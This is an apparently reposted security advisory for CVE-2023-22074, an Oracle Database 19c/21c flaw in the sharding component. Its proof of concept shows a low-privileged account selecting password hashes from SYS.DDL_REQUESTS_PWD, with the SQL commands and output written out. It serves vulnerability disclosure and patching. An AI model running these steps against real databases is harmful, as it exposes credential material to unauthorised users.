Advertisement






Oracle 19c / 21c Sharding Component Password Hash Exposure

CVE Category Price Severity
CVE-2023-22074 CWE-200 $10,000 High
Author Risk Exploitation Type Date
Unknown High Remote 2023-10-27
CVSS
CVSS:4.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023100053

Below is a copy:

Oracle 19c / 21c Sharding Component Password Hash Exposure
Title: CVE-2023-22074  Oracle database password hash exposure in sharding component
Product:                   Database
Manufacturer:              Oracle
Affected Version(s):       19c,21c [19.3-19.20 and 21.3-21.11]
Tested Version(s):         19c
Risk Level:                Low
Solution Status:           Fixed
CVE Reference:             CVE-2023-22074
Base Score:          2.4 
Author of Advisory:        Emad Al-Mousa


*****************************************
Vulnerability Details:

Vulnerability in the Oracle Database Sharding component of Oracle Database Server. Attacker compromising an account with create session and select any dictionary can view password hashes stored in a system table that is part of sharding component setup.


*****************************************
Proof of Concept (PoC):

I will create an account called jim in pluggable database ORCLPDB1 and grant the account create session and select any dictionary privilege:

SQL> alter session set container=ORCLPDB1;

Session altered.

SQL> create user jim identified by jim123;

User created.

SQL> grant create session,select any dictionary to jim;

Grant succeeded.

I will now connect using database account jim and the account will be able to view the password hashes in system table DDL_REQUESTS_PWD used by database sharding component:

sqlplus "jim/jim123"@ORCLPDB1

SQL> show user
USER is "JIM"
SQL> select * from SYS.DDL_REQUESTS_PWD;

   DDL_NUM  PWD_BEGIN
---------- ----------
ENC_PWD
--------------------------------------------------------------------------------
       123        445
E494684108560FFEF1C17CDE72F36A1A




*****************************************
References:
https://www.oracle.com/security-alerts/cpuoct2023.html
https://nvd.nist.gov/vuln/detail/CVE-2023-22074
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22074
https://databasesecurityninja.wordpress.com/2023/10/25/cve-2023-22074-oracle-database-password-hash-exposure-in-sharding-component/
https://github.com/emad-almousa/CVE-2023-22074


Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.